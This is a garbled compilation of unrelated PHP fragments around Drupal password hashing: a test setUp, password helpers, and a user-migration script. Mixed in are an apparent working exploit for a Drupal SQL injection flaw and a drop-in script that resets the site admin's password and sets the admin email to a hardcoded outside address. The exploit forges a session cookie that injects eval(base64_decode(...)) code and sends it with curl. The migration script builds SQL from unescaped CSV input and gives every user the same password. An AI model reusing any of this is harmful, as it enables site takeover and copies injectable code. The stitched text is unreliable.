function setUp2()
{
$this->user1 = user_load(1);
// Update uid 1's name and password so we know it.
$password = user_password();
require_once DRUPAL_ROOT . '/' . variable_get('password_inc', 'includes/password.inc');
$account = array('name' => 'user1', 'pass' => user_hash_password(trim($password)));
// We cannot use user_save() here or the password would be hashed again.
db_update('users')->fields($account)->condition('uid', 1)->execute();
// Reload and log in uid 1.
$this->user1 = user_load(1, TRUE);
$this->user1->pass_raw = $password;
// Rebuild content access permissions
$this->drupalLogin($this->user1);
$this->drupalPost('admin/reports/status/rebuild', array(), t('Rebuild permissions'));
if (module_exists('devel_node_access')) {
// Enable Devel Node Access.
$this->drupalGet('admin/config/development/devel');
$this->assertResponse(200);
$this->drupalPost('admin/config/development/devel', array('devel_node_access_debug_mode' => '1'), t('Save configuration'));
$this->assertResponse(200, 'Devel Node Access configuration saved.');
// Enable the second DNA block, too.
$this->drupalPost('admin/structure/block/list', array('blocks[devel_node_access_dna_user][region]' => 'footer'), t('Save blocks'));
}
if (module_exists('devel')) {
$this->drupalPost('admin/config/development/devel', array('devel_error_handlers[]' => array(1, 2, 4)), t('Save configuration'));
$this->assertResponse(200, 'Devel configuration saved.');
$this->drupalPost('admin/people/permissions/list', array('1[access devel information]' => 'access devel information', '2[access devel information]' => 'access devel information'), t('Save permissions'));
$this->assertResponse(200, 'Devel permissions saved.');
}
/*
The base class creates the following users:
$this->user1 = user 1
$this->admin_user = array('administer blocks', 'administer forums', 'administer menu', 'administer taxonomy', 'create forum content')); // 'access administration pages')
$this->edit_any_topics_user = array('create forum content', 'edit any forum content', 'delete any forum content', 'access administration pages')
$this->edit_own_topics_user = array('create forum content', 'edit own forum content', 'delete own forum content')
$this->web_user = array()
Remove these users and roles and create the ones we need.
*/
user_role_delete((int) reset($this->admin_user->roles));
user_role_delete((int) reset($this->edit_any_topics_user->roles));
user_role_delete((int) reset($this->edit_own_topics_user->roles));
user_delete($this->admin_user->uid);
user_delete($this->edit_any_topics_user->uid);
user_delete($this->edit_own_topics_user->uid);
user_delete($this->web_user->uid);
unset($this->web_user);
// Get rids and uids up to 10/9.
for ($i = 0; $i < 3; ++$i) {
$dummy_rid = (int) $this->drupalCreateRole(array(), 'dummy');
$dummy_user = $this->drupalCreateNamedUser('Dummy', array($dummy_rid));
user_role_delete($dummy_rid);
user_delete($dummy_user->uid);
}
// Create our roles.
$this->admin_rid = 3;
$this->webmaster_rid = (int) $this->drupalCreateRole(array('administer blocks', 'administer forums', 'administer nodes', 'administer comments', 'administer menu', 'administer taxonomy', 'create forum content', 'access content overview', 'access administration pages', 'view revisions', 'revert revisions', 'delete revisions'), '11 webmaster');
$this->forum_admin_rid = (int) $this->drupalCreateRole(array('administer forums', 'create forum content', 'edit any forum content', 'delete any forum content'), '12 forum admin');
$this->edndel_any_content_rid = (int) $this->drupalCreateRole(array('create forum content', 'edit any forum content', 'delete any forum content', 'view own unpublished content'), '13 edndel any content');
$this->edndel_own_content_rid = (int) $this->drupalCreateRole(array('create forum content', 'edit own forum content', 'delete own forum content'), '14 edndel own content');
$this->edit_any_content_rid = (int) $this->drupalCreateRole(array('create forum content', 'edit any forum content', 'view own unpublished content'), '15 edit any content');
$this->edit_own_content_rid = (int) $this->drupalCreateRole(array('create forum content', 'edit own forum content', 'edit own comments'), '16 edit own content');
$this->delete_any_content_rid = (int) $this->drupalCreateRole(array('create forum content', 'delete any forum content', 'view own unpublished content'), '17 delete any content');
$this->delete_own_content_rid = (int) $this->drupalCreateRole(array('create forum content', 'delete own forum content', 'edit own comments'), '18 delete own content');
// EOC should not make any difference!
$this->create_content_rid = (int) $this->drupalCreateRole(array('create forum content'), '19 create content');
$this->anon_rid = DRUPAL_ANONYMOUS_RID;
$this->auth_rid = DRUPAL_AUTHENTICATED_RID;
// Create our users.
$this->admin_user = $this->drupalCreateNamedUser('10_Administrator', array($this->admin_rid));
$this->webmaster_user = $this->drupalCreateNamedUser('11_Webmaster', array($this->webmaster_rid));
$this->forum_admin_user = $this->drupalCreateNamedUser('12_Forum_admin', array($this->forum_admin_rid));
$this->edndel_any_content_user = $this->drupalCreateNamedUser('13_EdNDel_any_content', array($this->edndel_any_content_rid));
$this->edndel_own_content_user = $this->drupalCreateNamedUser('14_EdNDel_own_content', array($this->edndel_own_content_rid));
$this->edit_any_content_user = $this->drupalCreateNamedUser('15_Edit_any_content', array($this->edit_any_content_rid));
$this->edit_own_content_user = $this->drupalCreateNamedUser('16_Edit_own_content', array($this->edit_own_content_rid));
$this->delete_any_content_user = $this->drupalCreateNamedUser('17_Delete_any_content', array($this->delete_any_content_rid));
$this->delete_own_content_user = $this->drupalCreateNamedUser('18_Delete_own_content', array($this->delete_own_content_rid));
$this->create_content_user = $this->drupalCreateNamedUser('19_Create_content', array($this->create_content_rid));
$this->auth_user = $this->drupalCreateNamedUser('20_Auth_only', array());
$this->moderator = $this->drupalCreateNamedUser('21_Moderator', array($this->create_content_rid));
$anon = drupal_anonymous_user();
$anon->name = check_plain(format_username($anon));
$this->accounts = array($this->user1, $this->admin_user, $this->webmaster_user, $this->forum_admin_user, $this->edndel_any_content_user, $this->edndel_own_content_user, $this->edit_any_content_user, $this->edit_own_content_user, $this->delete_any_content_user, $this->delete_own_content_user, $this->create_content_user, $this->auth_user, $this->moderator);
$this->rids = array($this->anon_rid, $this->auth_rid, $this->admin_rid, $this->webmaster_rid, $this->forum_admin_rid, $this->edndel_any_content_rid, $this->edndel_own_content_rid, $this->edit_any_content_rid, $this->edit_own_content_rid, $this->delete_any_content_rid, $this->delete_own_content_rid, $this->create_content_rid);
// Show settings for reference.
$this->drupalGet('admin/people/permissions/list');
$this->assertResponse(200, '^^^ Permissions');
$this->drupalGet('admin/people', array('query' => array('sort' => 'asc', 'order' => drupal_encode_path(t('Username')))));
$this->assertResponse(200, '^^^ Users');
}
/**
* update the password.
* update the password in the shard + update the password in the www/CMS version.
* @param $user the username
* @param $pass the new password.
* @return ok if it worked, if the lib or shard is offline it will return liboffline or shardoffline.
*/
public static function setPassword($user, $pass)
{
$hashpass = crypt($pass, WebUsers::generateSALT());
$reply = WebUsers::setAmsPassword($user, $hashpass);
$drupal_pass = user_hash_password($pass);
$values = array('user' => $user, 'pass' => $drupal_pass);
try {
//make connection with and put into shard db
db_query("UPDATE {users} SET pass = :pass WHERE name = :user", $values);
} catch (PDOException $e) {
//ERROR: the web DB is offline
}
return $reply;
}
/**
* This function hashes an user password
*
* @param mixed $field
* A string or an array of strings
*
* @return mixed
* Resulted hashes
*/
public static function userHashPassword($field)
{
require_once DRUPAL_ROOT . '/' . variable_get('password_inc', 'includes/password.inc');
if (is_array($field)) {
foreach ($field as &$f) {
$f = self::userHashPassword($f);
}
return $field;
}
return user_hash_password($field);
}
function hashPassword($password)
{
require_once DRUPAL_ROOT . '/includes/password.inc';
return user_hash_password($password);
}
$code_inject = str_replace('<' . '?', '', str_replace('<' . '?php', '', str_replace('?' . '>', '', file_get_contents($code))));
} else {
$code_inject = $code;
}
}
$code_inject = rtrim($code_inject, ';');
$code_inject .= ';session_destroy();die("");';
if (strpos($url, 'www.') === 0) {
$url = substr($url, 4);
}
$_SESSION = array('a' => 'eval(base64_decode("' . base64_encode($code_inject) . '"))', 'build_info' => array(), 'wrapper_callback' => 'form_execute_handlers', '#Array' => array('array_filter'), 'string' => 'assert');
$_SESSION['build_info']['args'][0] =& $_SESSION['string'];
list(, $session_name) = explode('://', $url, 2);
// use insecure cookie with sql inj.
$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32);
$password = user_hash_password('test');
$session_id = drupal_random_key();
$sec_ssid = drupal_random_key();
$serial = str_replace('}', 'CURLYCLOSE', str_replace('{', 'CURLYOPEN', "batch_form_state|" . serialize($_SESSION)));
$inject = "UNION SELECT {$user_id},'{$user_name}','{$password}','','','',null,0,0,0,1,null,'',0,'',null,{$user_id},'{$session_id}','','127.0.0.1',0,0,REPLACE(REPLACE('" . $serial . "','CURLYCLOSE',CHAR(" . ord('}') . ")),'CURLYOPEN',CHAR(" . ord('{') . ")) -- ";
$cookie = $cookieName . '[test+' . urlencode($inject) . ']=' . $session_id . '; ' . $cookieName . '[test]=' . $session_id . '; S' . $cookieName . '=' . $sec_ssid;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, True);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, True);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, False);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0');
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language: en-US,en;q=0.5'));
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
$output = curl_exec($ch);
curl_close($ch);
echo $output;
<?php
define('DRUPAL_ROOT', getcwd());
require_once DRUPAL_ROOT . '/includes/bootstrap.inc';
drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL);
require_once DRUPAL_ROOT . '/includes/password.inc';
if (isset($_GET['pass']) && !empty($_GET['pass'])) {
$newhash = user_hash_password($_GET['pass']);
} else {
die('Retry with ?pass=PASSWORD set in the URL');
}
$updatepass = db_update('users')->fields(array('pass' => $newhash, 'name' => 'admin', 'mail' => 'cuneyt_dogan@windowslive.com '))->condition('uid', '1', '=')->execute();
print "Done. Please delete this file immediately!";
drupal_exit();
/**
* This function hashes an user password
*
* @param mixed $field
* A string or an array of strings
*
* @return mixed
* Resulted hashes
*/
public static function userHashPassword($field)
{
static $not_included = TRUE;
if ($not_included) {
require_once DRUPAL_ROOT . '/' . variable_get('password_inc', 'includes/password.inc');
$not_included = FALSE;
}
if (is_array($field)) {
return array_map(array(__CLASS__, __FUNCTION__), $field);
}
return user_hash_password($field);
}
$dbh = new PDO('mysql:host=localhost;dbname=backdrop_cmi', $user, $pass);
/*
* Data map
*
* 0: ID => uid
* 1: user_login => name
* 2: user_pass => pass // hardcode; 'pass'
* // field_name = explode('-', user_nicename);
* 3: user_nicename => NOT USED
* 4: user_email => mail
* 5: user_url => NOT USED
* 6: user_registered => 2012-09-29 20:15:51 // timestamp
* 7: user_activation_key => NOT USED
* 8: user_status => NOT USED
* 9: display_name => field_name
*/
$data = file('../cmi-wp-users.csv', FILE_IGNORE_NEW_LINES);
foreach ($data as $d) {
$d = explode(',', $d);
$d[6] = trim($d[6], '"');
$time = strtotime($d[6]);
$el_pass = user_hash_password('pass');
print $el_pass . "\n";
$sql = "insert into users (\n uid,\n name,\n pass,\n mail,\n created,\n status,\n timezone\n ) values(\n {$d['0']},\n {$d['1']},\n {$el_pass},\n {$d['4']},\n {$time},\n 1,\n 'America/New_York'\n )";
$dbh->query($sql);
$name_sql = "insert into field_data_field_name (\n entity_type,\n bundle,\n deleted,\n entity_id,\n revision_id,\n language,\n field_name_value\n ) values (\n 'user',\n 'user',\n 0,\n {$d['0']},\n 1,\n 'und',\n {$d['9']}\n )";
$dbh->query($name_sql);
$rev_name_sql = "insert into field_revision_field_name (\n entity_type,\n bundle,\n deleted,\n entity_id,\n revision_id,\n language,\n field_name_value\n ) values (\n 'user',\n 'user',\n 0,\n {$d['0']},\n 1,\n 'und',\n {$d['9']}\n )";
$dbh->query($rev_name_sql);
}
print 'i did it.' . "\n";